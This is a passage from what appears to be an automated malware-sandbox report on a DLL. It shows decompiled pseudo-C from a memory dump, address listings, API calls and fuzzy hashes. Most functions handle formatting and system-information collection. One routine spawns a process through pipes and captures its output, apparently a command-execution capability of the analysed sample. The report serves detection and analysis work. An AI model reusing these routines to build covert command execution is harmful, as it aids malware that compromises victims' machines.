					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E100086E7(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109ea
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














                                                                                                                                                                                                0x1001215d
                                                                                                                                                                                                0x10012162
                                                                                                                                                                                                0x10012166
                                                                                                                                                                                                0x10012166
                                                                                                                                                                                                0x1001216b
                                                                                                                                                                                                0x10012170
                                                                                                                                                                                                0x10012171
                                                                                                                                                                                                0x10012174
                                                                                                                                                                                                0x10012175
                                                                                                                                                                                                0x1001217a
                                                                                                                                                                                                0x1001217d
                                                                                                                                                                                                0x1001217e
                                                                                                                                                                                                0x10012183
                                                                                                                                                                                                0x1001218a
                                                                                                                                                                                                0x10012230
                                                                                                                                                                                                0x10012230
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012199
                                                                                                                                                                                                0x10012199
                                                                                                                                                                                                0x100121a0
                                                                                                                                                                                                0x100121a4
                                                                                                                                                                                                0x100121ab
                                                                                                                                                                                                0x100121b4
                                                                                                                                                                                                0x100121b6
                                                                                                                                                                                                0x100121b6
                                                                                                                                                                                                0x100121b4
                                                                                                                                                                                                0x100121c5
                                                                                                                                                                                                0x100121eb
                                                                                                                                                                                                0x100121f4
                                                                                                                                                                                                0x100121f6
                                                                                                                                                                                                0x100121fc
                                                                                                                                                                                                0x1001222b
                                                                                                                                                                                                0x1001222b
                                                                                                                                                                                                0x10012233
                                                                                                                                                                                                0x10012236
                                                                                                                                                                                                0x10012236
                                                                                                                                                                                                0x100121fe
                                                                                                                                                                                                0x100121ff
                                                                                                                                                                                                0x10012205
                                                                                                                                                                                                0x10012207
                                                                                                                                                                                                0x10012207
                                                                                                                                                                                                0x1001220c
                                                                                                                                                                                                0x1001220b
                                                                                                                                                                                                0x1001220b
                                                                                                                                                                                                0x10012213
                                                                                                                                                                                                0x1001221f
                                                                                                                                                                                                0x10012229
                                                                                                                                                                                                0x10012229
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100121d5
                                                                                                                                                                                                0x100121d5
                                                                                                                                                                                                0x100121d5
                                                                                                                                                                                                0x100121db
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100121dd
                                                                                                                                                                                                0x100121e3
                                                                                                                                                                                                0x100121e8
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100121e8
                                                                                                                                                                                                0x100121c5

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strchr$_snprintflocaleconv
                                                                                                                                                                                                • String ID: %.*g
                                                                                                                                                                                                • API String ID: 1910550357-952554281
                                                                                                                                                                                                • Opcode ID: 633ebe45a3a3a25ebe47d92cc858d0fc9c71f4123d61e7f94c3707c68ec7679f
                                                                                                                                                                                                • Instruction ID: a6f77285e5284d09fbfa46df059558bf7b220b92f92aee1b91355ac70ca0eca3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 633ebe45a3a3a25ebe47d92cc858d0fc9c71f4123d61e7f94c3707c68ec7679f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B2128FA2447457AD311CA68AC85B5F37DCEF09360F160115FD408E282EA79EDE083A0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 100102EA, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _snprintfqsort
                                                                                                                                                                                                • String ID: %I64d$false$null$true
                                                                                                                                                                                                • API String ID: 756996078-4285102228
                                                                                                                                                                                                • Opcode ID: f4b213e507d8f97da4b4e9a0b1ecea4deed3accd0e571d64a6845a8ec2942bb3
                                                                                                                                                                                                • Instruction ID: 5291d36293679b7411612c3bc35531584a8851773ff116c659649a865596e283
                                                                                                                                                                                                • Opcode Fuzzy Hash: f4b213e507d8f97da4b4e9a0b1ecea4deed3accd0e571d64a6845a8ec2942bb3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 61E14F71A0024ABFDF15DF64CC45EAF3BA9EF44384F108019FD94DE151E6B1EAA19BA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000D78A, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000D79E
                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 1000D7A6
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000D7BA
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000D835
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000D838
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000D83D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                                                                                                                                                                                                • Instruction ID: 32d95d061c17d6e4a2a5c410f5dd007b4a6fcb662acd3d71dd279ae6813cd1ee
                                                                                                                                                                                                • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D21FB75D00219BFDB00DFA5CC88DAFBBBDEF48294B10849AF505A7250DA70AE05CBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1001082F, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                                • API String ID: 0-2132903582
                                                                                                                                                                                                • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                                                                                                                                                                                                • Instruction ID: 27dfd2a2be98919b1514e512a62619df5c07e2d22db7f950380e2dc72d172042
                                                                                                                                                                                                • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                                                                                                                                                                                                • Instruction Fuzzy Hash: B541E772B04245ABFB14DE988DA6BAE3AA8DF44254F100065FEC2DE243D6F5CED193D1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 10012237, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                			E10012237(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L10012305();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L100122C9();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L100122C9();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











                                                                                                                                                                                                0x10012237
                                                                                                                                                                                                0x1001223f
                                                                                                                                                                                                0x10012244
                                                                                                                                                                                                0x10012247
                                                                                                                                                                                                0x1001224c
                                                                                                                                                                                                0x10012252
                                                                                                                                                                                                0x1001225b
                                                                                                                                                                                                0x1001225f
                                                                                                                                                                                                0x1001225f
                                                                                                                                                                                                0x1001225b
                                                                                                                                                                                                0x10012261
                                                                                                                                                                                                0x10012266
                                                                                                                                                                                                0x1001226f
                                                                                                                                                                                                0x10012274
                                                                                                                                                                                                0x10012277
                                                                                                                                                                                                0x10012280
                                                                                                                                                                                                0x10012282
                                                                                                                                                                                                0x10012289
                                                                                                                                                                                                0x1001229a
                                                                                                                                                                                                0x1001229a
                                                                                                                                                                                                0x1001229c
                                                                                                                                                                                                0x100122a4
                                                                                                                                                                                                0x100122ab
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100122a6
                                                                                                                                                                                                0x100122aa
                                                                                                                                                                                                0x100122aa
                                                                                                                                                                                                0x1001228b
                                                                                                                                                                                                0x1001228b
                                                                                                                                                                                                0x10012291
                                                                                                                                                                                                0x10012293
                                                                                                                                                                                                0x10012298
                                                                                                                                                                                                0x100122ae
                                                                                                                                                                                                0x100122b1
                                                                                                                                                                                                0x100122b6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012298

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _errno$localeconvstrchrstrtod
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1035490122-0
                                                                                                                                                                                                • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                                                                                                                                                                                                • Instruction ID: 086184695cbe5e0caddc12f5d504f854cbf045e60efb7ca50336010bc76e979e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB01D4B9900245BBDB02AF24E90179D7BA4EF4A3A0F2141D0ED806B1E1DB75E9B4C7A4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000CFC6, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                			E1000CFC6(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x4cb04a0
				GetCurrentProcess();
				_t11 = E1000BA47();
				_t1 = _t29 + 0x1644; // 0x4cb1ae4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008F9F(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x4cb06c8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008F9F(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3F8(_t3);
				_t7 = _t29 + 0x220; // 0x4cb06c0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E433(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








                                                                                                                                                                                                0x1000cfc9
                                                                                                                                                                                                0x1000cfcb
                                                                                                                                                                                                0x1000cfd2
                                                                                                                                                                                                0x1000cfda
                                                                                                                                                                                                0x1000cfe4
                                                                                                                                                                                                0x1000cfe4
                                                                                                                                                                                                0x1000cfea
                                                                                                                                                                                                0x1000cff3
                                                                                                                                                                                                0x1000cff9
                                                                                                                                                                                                0x1000cffb
                                                                                                                                                                                                0x1000cfff
                                                                                                                                                                                                0x1000cfff
                                                                                                                                                                                                0x1000d004
                                                                                                                                                                                                0x1000d00a
                                                                                                                                                                                                0x1000d01a
                                                                                                                                                                                                0x1000d024
                                                                                                                                                                                                0x1000d02c
                                                                                                                                                                                                0x1000d02f
                                                                                                                                                                                                0x1000d03b
                                                                                                                                                                                                0x1000d041
                                                                                                                                                                                                0x1000d046
                                                                                                                                                                                                0x1000d04c
                                                                                                                                                                                                0x1000d052
                                                                                                                                                                                                0x1000d058
                                                                                                                                                                                                0x1000d060

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,04CB04A0,?,10003538), ref: 1000CFD2
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,04CB1AE4,00000105,?,?,04CB04A0,?,10003538), ref: 1000CFF3
                                                                                                                                                                                                • memset.MSVCRT ref: 1000D024
                                                                                                                                                                                                • GetVersionExA.KERNEL32(04CB04A0,04CB04A0,?,10003538), ref: 1000D02F
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,10003538), ref: 1000D035
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentProcess$FileModuleNameVersionmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3581039275-0
                                                                                                                                                                                                • Opcode ID: e720e9748f940e1c78afa2b0c5b0b5805673a7d0e649baaed66beca1eab902bd
                                                                                                                                                                                                • Instruction ID: 0d16582dd2ff8010aa23be89b22810bf8e349fa17640e1ee15117ca85d12a9b7
                                                                                                                                                                                                • Opcode Fuzzy Hash: e720e9748f940e1c78afa2b0c5b0b5805673a7d0e649baaed66beca1eab902bd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 24015E74901B149BF721DF70C84ABEA7BE5EF84350F00082DE59687251EB74B745CB54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000B988, Relevance: 7.5, APIs: 5, Instructions: 32threadCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E1000B988(void* __ecx) {
				void* _v8;
				void* _t9;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0 || GetLastError() == 0x3f0 && OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t9 = _v8;
				} else {
					_t9 = 0;
				}
				return _t9;
			}





                                                                                                                                                                                                0x1000b9a7
                                                                                                                                                                                                0x1000b9d4
                                                                                                                                                                                                0x1000b9d0
                                                                                                                                                                                                0x1000b9d0
                                                                                                                                                                                                0x1000b9d0
                                                                                                                                                                                                0x1000b9d9

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 1000B99B
                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,1000BABE,74E5F500,10000000), ref: 1000B9A2
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,1000BABE,74E5F500,10000000), ref: 1000B9A9
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BABE,74E5F500,10000000), ref: 1000B9C2
                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,1000BABE,74E5F500,10000000), ref: 1000B9C9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentOpenProcessThreadToken$ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 102224034-0
                                                                                                                                                                                                • Opcode ID: 84585c1d749f43a300b2851fef88a950c0520a77058640d0fe3f64d56e4382ed
                                                                                                                                                                                                • Instruction ID: ca8ed1b689af3012cf9c2ca491e1653bf6f8c814a453f8472bc232ba4ddfea60
                                                                                                                                                                                                • Opcode Fuzzy Hash: 84585c1d749f43a300b2851fef88a950c0520a77058640d0fe3f64d56e4382ed
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DF05E7150065AAFFB40DBA58C48F5A33ACFB04284F014415F702E3154D670EF048761
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000A9F9, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                			E1000A9F9(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E100085FB( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x4d2f878
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x4d2f878
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E100085E5(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x4d2f878
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x4d2f878
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x4d2f878
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x4d2f878
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E10009187(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009273(_t127);
						E100085FB( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C3BB(_t127));
				_t98 =  *0x1001e68c; // 0x4d2fa40
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x4d2f878
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x4d2f878
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E10009237(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E100085FB( &_v32, 0);
				return _t128;
			}




































                                                                                                                                                                                                0x1000aa04
                                                                                                                                                                                                0x1000aa06
                                                                                                                                                                                                0x1000aa12
                                                                                                                                                                                                0x1000aa17
                                                                                                                                                                                                0x1000aa1a
                                                                                                                                                                                                0x1000aa1c
                                                                                                                                                                                                0x1000aa1f
                                                                                                                                                                                                0x1000aa22
                                                                                                                                                                                                0x1000aa29
                                                                                                                                                                                                0x1000aa2c
                                                                                                                                                                                                0x1000aa33
                                                                                                                                                                                                0x1000aa36
                                                                                                                                                                                                0x1000aa40
                                                                                                                                                                                                0x1000aa41
                                                                                                                                                                                                0x1000aa44
                                                                                                                                                                                                0x1000aa46
                                                                                                                                                                                                0x1000aa47
                                                                                                                                                                                                0x1000aa5e
                                                                                                                                                                                                0x1000abde
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000abde
                                                                                                                                                                                                0x1000aa75
                                                                                                                                                                                                0x1000abaa
                                                                                                                                                                                                0x1000abb0
                                                                                                                                                                                                0x1000abbb
                                                                                                                                                                                                0x1000abbd
                                                                                                                                                                                                0x1000abc5
                                                                                                                                                                                                0x1000abc5
                                                                                                                                                                                                0x1000abcc
                                                                                                                                                                                                0x1000abce
                                                                                                                                                                                                0x1000abd7
                                                                                                                                                                                                0x1000abd7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000abda
                                                                                                                                                                                                0x1000aa7b
                                                                                                                                                                                                0x1000aa7e
                                                                                                                                                                                                0x1000aa81
                                                                                                                                                                                                0x1000aa87
                                                                                                                                                                                                0x1000aa91
                                                                                                                                                                                                0x1000aa9b
                                                                                                                                                                                                0x1000aaa2
                                                                                                                                                                                                0x1000aaab
                                                                                                                                                                                                0x1000aaad
                                                                                                                                                                                                0x1000aab3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000aabe
                                                                                                                                                                                                0x1000aac5
                                                                                                                                                                                                0x1000aac6
                                                                                                                                                                                                0x1000aacb
                                                                                                                                                                                                0x1000aacc
                                                                                                                                                                                                0x1000aacd
                                                                                                                                                                                                0x1000aad2
                                                                                                                                                                                                0x1000aad4
                                                                                                                                                                                                0x1000aad5
                                                                                                                                                                                                0x1000aad6
                                                                                                                                                                                                0x1000aad9
                                                                                                                                                                                                0x1000aadf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000aae5
                                                                                                                                                                                                0x1000aaed
                                                                                                                                                                                                0x1000aaf0
                                                                                                                                                                                                0x1000aaf8
                                                                                                                                                                                                0x1000aafb
                                                                                                                                                                                                0x1000aafe
                                                                                                                                                                                                0x1000ab04
                                                                                                                                                                                                0x1000ab18
                                                                                                                                                                                                0x1000ab1e
                                                                                                                                                                                                0x1000ab24
                                                                                                                                                                                                0x1000ab4d
                                                                                                                                                                                                0x1000ab26
                                                                                                                                                                                                0x1000ab26
                                                                                                                                                                                                0x1000ab28
                                                                                                                                                                                                0x1000ab2a
                                                                                                                                                                                                0x1000ab32
                                                                                                                                                                                                0x1000ab3a
                                                                                                                                                                                                0x1000ab3f
                                                                                                                                                                                                0x1000ab3f
                                                                                                                                                                                                0x1000ab53
                                                                                                                                                                                                0x1000ab55
                                                                                                                                                                                                0x1000ab55
                                                                                                                                                                                                0x1000ab5d
                                                                                                                                                                                                0x1000ab65
                                                                                                                                                                                                0x1000ab66
                                                                                                                                                                                                0x1000ab6b
                                                                                                                                                                                                0x1000ab74
                                                                                                                                                                                                0x1000ab94
                                                                                                                                                                                                0x1000ab94
                                                                                                                                                                                                0x1000ab9c
                                                                                                                                                                                                0x1000ab9f
                                                                                                                                                                                                0x1000aba7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000aba7
                                                                                                                                                                                                0x1000ab7d
                                                                                                                                                                                                0x1000ab81
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000ab89
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 1000AA36
                                                                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA5A
                                                                                                                                                                                                • CreatePipe.KERNEL32(1000658A,?,0000000C,00000000), ref: 1000AA71
                                                                                                                                                                                                  • Part of subcall function 100085E5: HeapAlloc.KERNEL32(00000008,?,?,10008F65,00000100,?,10005FAC), ref: 100085F3
                                                                                                                                                                                                  • Part of subcall function 100085FB: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006024), ref: 10008641
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
